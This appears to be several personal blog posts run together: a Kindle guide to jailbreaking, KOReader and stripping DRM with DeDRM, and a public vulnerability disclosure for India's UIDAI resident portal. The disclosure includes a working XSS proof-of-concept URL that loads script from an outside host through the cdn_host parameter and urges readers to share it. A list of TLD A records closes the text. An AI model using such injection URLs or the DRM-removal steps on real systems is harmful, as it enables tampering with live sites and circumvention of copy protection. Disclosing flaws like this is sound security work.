Abhay Rana aka Nemo

Kindle Hacks, A Self-guide

I run a non-standard Kindle configuration:

  1. Jailbroken (because I want to own the device, not rent it)
  2. Runs KOReader (because I want to read EPUBs and PDFs with reflow.)
  3. DRM Stripping (because I want to own the book, not rent it)

Since I don’t do any of these often enough to automate it, this is a self guide to help me follow these steps the next time I have to do any of this. No guarantees of this being helpful to anyone else but me.

Jailbreak

The lifehacker guide on how to jailbreak your kindle is a good starting point [archived]. The mobileread forums have the definitive guides. Also see this FAQ on the mobileread wiki.

(Most of these only cover modern paperwhite kindles)

Maintaining the Jailbreak

Sometimes, Kindle firmware updates will stop the Jailbreak. Search for your firmware on mobileread forums. See this link for the 5.8 series.

Copy the .bin file to your kindle root directory and trigger a manual firmware update. That should reboot and re-affirm the jailbreak. To trigger a manual firmware update, go to the Kindle Menu and click “Update”. If it is greyed out, check if the file was copied correctly, and try rebooting.

Applications

Once you have a jailbreak, the rest is mostly installing packages via MRPI. I keep a ready directory of packages I can copy as-is to my Kindle. The current listing is at https://paste.ubuntu.com/p/CXS5hYZdqc/ with most of it just being koreader.

koreader is a FOSS document viewer for E Ink devices that supports Kindle, Kobo, PocketBook, Ubuntu Touch and Android devices.

The primary 2 packages are:

  • Update_KUALBooklet_v2.7_install.bin
  • update_kpvbooklet_0.6.6_install.bin

Run ;log mrpi via search after copying them to re-install them if needed.

koreader

Download the latest release from GitHub.

You should download the kindle5-linux-gnueabi package for modern Paperwhites. Unzip it to the copy directory mentioned above.

Aside: koreader has a linux appimage version for desktops, which I package for AUR.

DRM Related Stuff

DRM is inherently bad for users. If I switch my Ebook reader from Kindle (which are great as of today) to a Kobo tomorrow, I want my content to stay with me.

There are much better websites that explain the issues with DRM, so go visit: fckdrm.com, DefectiveByDesign.org, or EFF/drm.

The primary tool for stripping DRM from Kindle books is apprenticeharper’s DeDRM Repo which works as a Calibre Plugin.

Getting the Key

My current key is saved in pass:

pass show Keys/Kindle.k4i |jq

Save it in a file, which you can import to Calibre.

If you don’t have the key or if the above isn’t valid, see this comment on r/ebooks [archived].

Importing the Key

At the bottom-left of the plugin’s customization dialog, you will see a button labeled “Import Existing Keyfiles”. Use this button to import existing ‘.k4i’ key files. Key files might come from being exported from this plugin, or may have been generated using the kindlekey.pyw script running under Wine on Linux systems.

I once did some trickery on the kindlekey.pyw application to get it working on my system, but I didn’t take notes. If I ever do this again - AUTOMATE THIS.

Stripping DRM

Stripping DRM for any medium is always a cat-and-mouse game. Amazon keeps changing the DRM format in every Kindle firmware update, which is why the recommended method is to use a known/older version of the Kindle for Mac/PC Application as your source.

Note: The 1.24.3 release does not work on Linux. If you’re on Linux, you must instead download the 1.17.0 release instead (sha256=14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200).

  1. Install Kindle for PC. It does work on Wine. Make sure you download 1.24.3 (51068). I trust filehippo for this. The sha256sum for the installer is c7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7.
  2. Install then launch it, and download the book.
  3. Go to ~/Documents/My Kindle Content
  4. Find book by Last Modified Date.
  5. Run calibredb add book.azw. If all goes well, the book should show up in your library, and you should be able to convert it.

Reference Files

I have a backup of my current Kindle files at http://ge.tt/75zk4Dv2 in case you need any of the files mentioned above. Checksums for the files are below, since ge.tt doesn’t believe in HTTPS:

e3b05193ed9d0b482f01dfb550eba67f3b113b5165aae5632379cf35fec2f59d  copy.tar.gz
14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200  KindleForPC-installer-1.17.44170.exe
c7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7  KindleForPC-installer-1.24.51068.exe
50bb0e5d9c03bcb79b17c1b7063cefd2c947a9d1c4392814e6ec05225296472a  kual-helper-0.5.N.zip
39352b4b68993680f06d5ecc57ce7ec4c271b6b5f2386ea998027420c45f2acd  KUAL-KDK-1.0.azw2
ceb207ee4c8d3674f308ff91432aeabf213b203571e270f70b8ae218df6ded7d  KUAL-KDK-2.0.azw2
fce02f0e104e846f1e4cc0e029500c5a722614d63a47035d78ea4cf59f67a448  kual-mrinstaller-1.6.N.zip
4a6de1fafe47ec0e3bfb529edead401c92e66b00697d507abe945679b3b7bc65  KUAL-v2.7.zip
253d0b00b31d62ef9dadb7ca88b98e2718cb35246816b3c50dd63c0a7ef28a52  Update_jailbreak_hotfix_1.14_5.8.10_install.bin
cc63ba1b454d1f32492c835f108ee04aaa80e6e7a95f12b7216c2c015daa2fbc  Update_jailbreak_hotfix_1.14_nomax_install.bin

Aadhaar Vulnerability Public Disclosure

The Vulnerability

The UIDAI Resident Portal (with read access to entire Aadhaar Demographic data) is runing a vulnerable version of LifeRay software. It is running LifeRay 6.1, which was declared End-of-Life in Febrary 2016.

This release includes multiple known vulnerabilities, including:

  1. A XSS issue, for which a PoC can be found at resident.uidai.gov.in (Picture Credits: @sanitarypanels)
  2. Multiple RCEs: See issue-62 for eg.

In fact the release is so old it does not even appear on the “Known Vulnerabilities” page on the LifeRay website; you have to go look at their Archived Vulnerabilities.

The PoC

You can find a simple Proof of Concept for the XSS issue at resident.uidai.gov.in.

The cdn_host parameter injects javascript from $CDN_HOST/Resident-theme/js/custom.js, in this case https://scan.bb8.fun/Resident-theme/js/custom.js which hosts a small snippet to overwrite the HTML of the page.

It shows up like:

Fun

The current script allows for embeding any tweet using a tweet parameter. To embed:

Go to any tweet, copy the part after twitter.com and pass it as the tweet parameter. For eg, to embed this tweet:

  1. Look at the URL: https://twitter.com/13footwall/status/979301578686345216
  2. Copy 13footwall/status/979301578686345216 and pass it as the tweet parameter:
  3. The URL becomeshttps://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&tweet=13footwall/status/979301578686345216
  4. SHARE IT

The Report

I initially reported this to help@uidai.gov.in in Jan 2017:

Forgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:

Update

There is some confusion regarding which version of LifeRay is UIDAI running. They seem to be running 6.1.1, released in 2013-02-26.

The exact version is not relevant to the fact that UIDAI is:

  • running an unsupported release
  • which is 5 year old
  • not updating it despite being notified multiple times

0800 16-Sep: UIDAI seems to have patched the issue by putting a block on the cdn_host parameter. This still leaves them vulnerable to multiple vulnerabilities until they update to a supported release.

Timeline

The vulnerability is still not fixed. Here is a complete timeline:

Date What?
16 Jan 2017 Initially reported to help@uidai.gov.in. No response
21 Jan 2018 Reported to ceo@uidai.gov.in and info@cert-in.org.in. No response
19 Feb 2018 Reminder sent to ceo@uidai.gov.in and info@cert-in.org.in
19 Feb 2018 Acknowledgement from CERT
15 Mar 2018 Reminder sent. No response
17 Mar 2018 Notified NCIIPC
18 Mar 2018 Confirmation from NCIIPC asking for more details. I replied back with a quote of previous exchange
19 Mar 2018 Confirmation from NCIIPC thanking me for the report.
19 Apr 2018 Reminder sent to UIDAI asking for acknowledgement
30 May 2018 Reminder sent to NCIIPC and CERT asking for updates

The only change that I’m aware of since my initial report is that the website stopped declaring the LifeRay version in a HTTP response Header.

A records on top level domains

A few more changes since the last time I ran this.

TLD IP Web
ai 209.59.119.34 [http] [https]
arab 127.0.53.53 [http] [https]
bh 88.201.27.211 [http] [https]
charity 127.0.53.53 [http] [https]
cm 195.24.205.60 [http] [https]
dk 193.163.102.58 [http] [https]
gg 87.117.196.80 [http] [https]
inc 127.0.53.53 [http] [https]
je 87.117.196.80 [http] [https]
pa 168.77.8.43 [http] [https]
pn 80.68.93.100 [http] [https]
politie 127.0.53.53 [http] [https]
tk 217.119.57.22 [http] [https]
uz 91.212.89.8 [http] [https]
ws 64.70.19.33 [http] [https]
мон 202.170.80.40 [http] [https]
мон 218.100.84.27 [http] [https]
мон 180.149.98.78 [http] [https]
政府 127.0.53.53 [http] [https]
عرب 127.0.53.53 [http] [https]

Diff:

+bh
+charity
-etisalat
+inc
-اتصالات
-招聘
 政府